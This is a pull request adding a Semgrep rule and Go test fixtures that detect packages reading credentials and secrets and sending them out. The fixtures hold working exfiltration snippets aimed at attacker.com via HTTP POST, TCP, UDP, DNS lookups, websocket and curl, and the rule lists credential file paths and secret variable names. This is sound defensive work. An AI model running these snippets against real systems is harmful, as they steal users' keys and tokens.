### PR TITLE
[Go - New Detection] Detect data collection and exfiltration in Go

### DIFF
--- a/README.md
+++ b/README.md
@@ -165,6 +165,7 @@ Source code heuristics:
 | shady-links | Identify when a package contains an URL to a domain with a suspicious extension |
 | go-exec-base64 | Identify Base64-decoded content being passed to execution functions |
 | go-exec-download | Identify Go code that downloads potentially executable files |
+| go-exfiltrate-sensitive-data | Identify Go code that reads and exfiltrates sensitive|
 
 Metadata heuristics:
 

--- a/guarddog/analyzer/sourcecode/go-exfiltrate-sensitive-data.yml
+++ b/guarddog/analyzer/sourcecode/go-exfiltrate-sensitive-data.yml
@@ -2,54 +2,84 @@ rules:
   - id: go-exfiltrate-sensitive-data
     languages:
       - go
-    message: Identify when a package reads and exfiltrates sensitive data from the local system.
+    message: Identify when a package reads and exfiltrates sensitive data from the
+      local system.
     metadata:
-      description: This rule detects Go code that downloads a remote binary and
-        executes it after setting executable permissions.
+      description: This rule identifies when a package reads and exfiltrates sensitive
+        data from the local system.
     severity: WARNING
     mode: taint
     pattern-sources:
       - pattern-either:
-          - pattern: os.Hostname()
-          - pattern: os.Getenv($USER)
-          - pattern: os.Environ()
+          - pattern: $S = os.Hostname()
+          - pattern: $S = os.Getenv($USER)
+          - pattern: $S = os.Environ()
           - patterns:
               - pattern-either:
                   - pattern: |
-                        $OS.ReadFile($FILE)
-                        ...
-                  - pattern: |
-                        $OS.Open($FILE)
-                        ...
-                  - pattern: |
-                        $OS.OpenFile($FILE,...)
-                        ...
+                      $S = $OS.ReadFile($FILE)
+                      ...
+                  - patterns:
+                      - pattern-either:
+                          - pattern: |
+                              $OS.Open($FILE)
+                              ...
+                              $READCONENT
+                          - pattern: |
+                              $OS.OpenFile($FILE,...)
+                              ...
+                              $READCONENT
+                      - metavariable-pattern:
+                          metavariable: $READCONENT
+                          pattern-either:
+                            - pattern: |
+                                $S = $IO.ReadAll($FILE)
+                                ...
+                            - pattern: $S = $BUFIO.NewScanner($FILE)
+                            - pattern: |
+                                $S = $BUFIO.NewReader($FILE)
+                                ...
+                            - pattern: |
+                                $S = $F.Read($DATA)
+                                ...
+                            - pattern: |
+                                $S = $F.ReadAll($FILE)
+                                ...
               - metavariable-regex:
                   metavariable: $FILE
                   regex: \".*(\.aws\/(credentials|config)|\.config\/gcloud\/credentials|gcp.*\.json|\.azure\/(accessTokens|azureProfile)|\.ssh\/.*|\.git-credentials|\.netrc|\.npmrc|google-chrome\/.*\/(Cookies|Login\s?Data)|firefox\/.*\/(cookies\.sqlite|logins\.json)|\.docker\/config\.json|\.kube\/config)\"
           - patterns:
               - pattern-either:
                   - pattern: |
-                        $OS.Getenv($ENVAR)
-                        ...
+                      $S = $OS.Getenv($ENVAR)
+                      ...
                   - pattern: |
-                        $OS.LookupEnv($ENVAR)
-                        ...
+                      $S = $OS.LookupEnv($ENVAR)
+                      ...
                   - pattern: |
-                        exec.Command(...,$ENVAR)
-                        ...
+                      $S = exec.Command(...,$ENVAR)
+                      ...
               - metavariable-regex:
                   metavariable: $ENVAR
                   regex: \"(AWS_ACCESS_KEY_ID|AWS_SECRET_ACCESS_KEY|AWS_SESSION_TOKEN|GOOGLE_APPLICATION_CREDENTIALS|AZURE_CLIENT_SECRET|CI_JOB_TOKEN|GITHUB_TOKEN|GITLAB_TOKEN|API_KEY|SECRET_KEY|ACCESS_TOKEN|TOKEN|PASSWORD)\"
     pattern-sinks:
       - pattern-either:
-          - pattern: $HTTP.Post(...)
-          - pattern: $HTTP.NewRequest(...)
-          - pattern: $HTTP.PostForm(...)
-          - pattern: $NET.Dial(...)
-          - pattern: $NET.DialTCP(...)
-          - pattern: $NET.DialUDP(...)
-          - pattern: $NET.DialTimeout(...)
+          - pattern: http.Post(...,$S)
+          - pattern: http.NewRequest("POST",...,$S)
+          - pattern: http.PostForm(...,$S)
+          - pattern: $SMTP.SendMail(...,$S)
           - pattern: $NET.LookupHost(...)
-          - pattern: $SMTP.SendMail(...)
-          - pattern: exec.Command(...)
+          - patterns:
+              - pattern: |
+                  $CONN,... := $NET.Dial(...)
+                  ...
+                  $SEND
+              - metavariable-pattern:
+                  metavariable: $SEND
+                  pattern-either:
+                    - pattern: $CONN.Write($S)
+                    - pattern: $CONN.Write(...,$S)
+                    - pattern: $CONN.WriteString($S)
+                    - pattern: $CONN.WriteTo($S,...)
+                    - pattern: $CONN.WriteMessage($S,...)
+                    - pattern: fmt.Fprintf(conn, $S)

--- a/guarddog/analyzer/sourcecode/go-exfiltrate-sensitive-data.yml
+++ b/guarddog/analyzer/sourcecode/go-exfiltrate-sensitive-data.yml
@@ -1,0 +1,55 @@
+rules:
+  - id: go-exfiltrate-sensitive-data
+    languages:
+      - go
+    message: Identify when a package reads and exfiltrates sensitive data from the local system.
+    metadata:
+      description: This rule detects Go code that downloads a remote binary and
+        executes it after setting executable permissions.
+    severity: WARNING
+    mode: taint
+    pattern-sources:
+      - pattern-either:
+          - pattern: os.Hostname()
+          - pattern: os.Getenv($USER)
+          - pattern: os.Environ()
+          - patterns:
+              - pattern-either:
+                  - pattern: |
+                        $OS.ReadFile($FILE)
+                        ...
+                  - pattern: |
+                        $OS.Open($FILE)
+                        ...
+                  - pattern: |
+                        $OS.OpenFile($FILE,...)
+                        ...
+              - metavariable-regex:
+                  metavariable: $FILE
+                  regex: \".*(\.aws\/(credentials|config)|\.config\/gcloud\/credentials|gcp.*\.json|\.azure\/(accessTokens|azureProfile)|\.ssh\/.*|\.git-credentials|\.netrc|\.npmrc|google-chrome\/.*\/(Cookies|Login\s?Data)|firefox\/.*\/(cookies\.sqlite|logins\.json)|\.docker\/config\.json|\.kube\/config)\"
+          - patterns:
+              - pattern-either:
+                  - pattern: |
+                        $OS.Getenv($ENVAR)
+                        ...
+                  - pattern: |
+                        $OS.LookupEnv($ENVAR)
+                        ...
+                  - pattern: |
+                        exec.Command(...,$ENVAR)
+                        ...
+              - metavariable-regex:
+                  metavariable: $ENVAR
+                  regex: \"(AWS_ACCESS_KEY_ID|AWS_SECRET_ACCESS_KEY|AWS_SESSION_TOKEN|GOOGLE_APPLICATION_CREDENTIALS|AZURE_CLIENT_SECRET|CI_JOB_TOKEN|GITHUB_TOKEN|GITLAB_TOKEN|API_KEY|SECRET_KEY|ACCESS_TOKEN|TOKEN|PASSWORD)\"
+    pattern-sinks:
+      - pattern-either:
+          - pattern: $HTTP.Post(...)
+          - pattern: $HTTP.NewRequest(...)
+          - pattern: $HTTP.PostForm(...)
+          - pattern: $NET.Dial(...)
+          - pattern: $NET.DialTCP(...)
+          - pattern: $NET.DialUDP(...)
+          - pattern: $NET.DialTimeout(...)
+          - pattern: $NET.LookupHost(...)
+          - pattern: $SMTP.SendMail(...)
+          - pattern: exec.Command(...)

--- a/tests/analyzer/sourcecode/go-exfiltrate-sensitive-data.go
+++ b/tests/analyzer/sourcecode/go-exfiltrate-sensitive-data.go
@@ -7,7 +7,6 @@ import (
 	"net/http"
 	"net/url"
 	"os"
-	"os/exec"
 	"strings"
 
 	"nhooyr.io/websocket"
@@ -57,18 +56,6 @@ func test4() {
 }
 
 func test5() {
-	// ruleid: go-exfiltrate-sensitive-data
-	cmd := exec.Command("printenv", "SECRET_KEY")
-	output, err := cmd.Output()
-	if err == nil {
-		data := strings.TrimSpace(string(output))
-		// ruleid: go-exfiltrate-sensitive-data
-		exfil := exec.Command("curl", "-d", data, "http://attacker.com/upload")
-		exfil.Run()
-	}
-}
-
-func test6() {
 	key := os.Getenv("SECRET_KEY")
 	hash := strings.ToUpper(key)
 	if strings.HasPrefix(hash, "AKIA") {
@@ -78,7 +65,7 @@ func test6() {
 	}
 }
 
-func test7() {
+func test6() {
 	data, err := os.ReadFile("/home/user/.ssh/config")
 	if err == nil {
 		modified := strings.ReplaceAll(string(data), "\n", "; ")
@@ -87,7 +74,7 @@ func test7() {
 	}
 }
 
-func test8() {
+func test7() {
 	data, err := os.ReadFile("/tmp/log.txt")
 	if err == nil {
 		fmt.Println("Log size:", len(data))
@@ -95,14 +82,14 @@ func test8() {
 		http.Get("http://example.com/heartbeat")
 	}
 }
-func test9() {
+func test8() {
 	//ok: go-exfiltrate-sensitive-data
 	token := os.Getenv("GITHUB_TOKEN")
 	if len(token) > 0 {
 		fmt.Println("Token loaded successfully")
 	}
 }
-func test10() {
+func test9() {
 	//ok: go-exfiltrate-sensitive-data
 	resp, err := http.Get("http://example.com/status")
 	if err == nil {

--- a/tests/analyzer/sourcecode/go-exfiltrate-sensitive-data.go
+++ b/tests/analyzer/sourcecode/go-exfiltrate-sensitive-data.go
@@ -1,0 +1,111 @@
+package main
+
+import (
+	"context"
+	"fmt"
+	"net"
+	"net/http"
+	"net/url"
+	"os"
+	"os/exec"
+	"strings"
+
+	"nhooyr.io/websocket"
+)
+
+func test1() {
+	data := os.Getenv("AWS_SECRET_ACCESS_KEY")
+	if len(data) > 0 {
+		fmt.Println("Environment loaded")
+		prepared := strings.TrimSpace(data)
+		// ruleid: go-exfiltrate-sensitive-data
+		http.Post("http://attacker.com/exfil", "text/plain", strings.NewReader(prepared))
+	}
+}
+
+func test2() {
+	data, err := os.ReadFile("/home/user/.aws/credentials")
+	if err == nil {
+		lines := strings.Split(string(data), "\n")
+		if len(lines) > 5 {
+			lines = lines[:5]
+		}
+		filtered := strings.Join(lines, "\n")
+		// ruleid: go-exfiltrate-sensitive-data
+		conn, _ := net.Dial("tcp", "attacker.com:4444")
+		conn.Write([]byte(filtered))
+	}
+}
+
+func test3() {
+	user := os.Getenv("USER")
+	hostname, _ := os.Hostname()
+	combined := fmt.Sprintf("%s@%s", user, hostname)
+	if strings.Contains(combined, "admin") {
+		// ruleid: go-exfiltrate-sensitive-data
+		net.LookupHost(combined + ".attacker.com")
+	}
+}
+
+func test4() {
+	token := os.Getenv("GITHUB_TOKEN")
+	logMessage := fmt.Sprintf("Processing token for user context")
+	fmt.Println(logMessage)
+	// ruleid: go-exfiltrate-sensitive-data
+	conn, _, _ := websocket.Dial(context.Background(), "ws://attacker.com/ws", nil)
+	conn.Write(context.Background(), websocket.MessageText, []byte("session="+token))
+}
+
+func test5() {
+	// ruleid: go-exfiltrate-sensitive-data
+	cmd := exec.Command("printenv", "SECRET_KEY")
+	output, err := cmd.Output()
+	if err == nil {
+		data := strings.TrimSpace(string(output))
+		// ruleid: go-exfiltrate-sensitive-data
+		exfil := exec.Command("curl", "-d", data, "http://attacker.com/upload")
+		exfil.Run()
+	}
+}
+
+func test6() {
+	key := os.Getenv("SECRET_KEY")
+	hash := strings.ToUpper(key)
+	if strings.HasPrefix(hash, "AKIA") {
+		// ruleid: go-exfiltrate-sensitive-data
+		conn, _ := net.Dial("udp", "attacker.com:53")
+		conn.Write([]byte(hash))
+	}
+}
+
+func test7() {
+	data, err := os.ReadFile("/home/user/.ssh/config")
+	if err == nil {
+		modified := strings.ReplaceAll(string(data), "\n", "; ")
+		// ruleid: go-exfiltrate-sensitive-data
+		http.PostForm("http://attacker.com/submit", url.Values{"payload": {modified}})
+	}
+}
+
+func test8() {
+	data, err := os.ReadFile("/tmp/log.txt")
+	if err == nil {
+		fmt.Println("Log size:", len(data))
+		//ok: go-exfiltrate-sensitive-data
+		http.Get("http://example.com/heartbeat")
+	}
+}
+func test9() {
+	//ok: go-exfiltrate-sensitive-data
+	token := os.Getenv("GITHUB_TOKEN")
+	if len(token) > 0 {
+		fmt.Println("Token loaded successfully")
+	}
+}
+func test10() {
+	//ok: go-exfiltrate-sensitive-data
+	resp, err := http.Get("http://example.com/status")
+	if err == nil {
+		fmt.Println("Ping response:", resp.StatusCode)
+	}
+}


### PR DESCRIPTION
This PR adds a Semgrep detection rule to identify Go packages that read and exfiltrate sensitive data from the local system.
The rule was tested against a large local code base and the [top 100 Go packages](https://github.com/EvanLi/Github-Ranking/blob/master/Top100/Go.md), with zero potentially malicious indicators matched.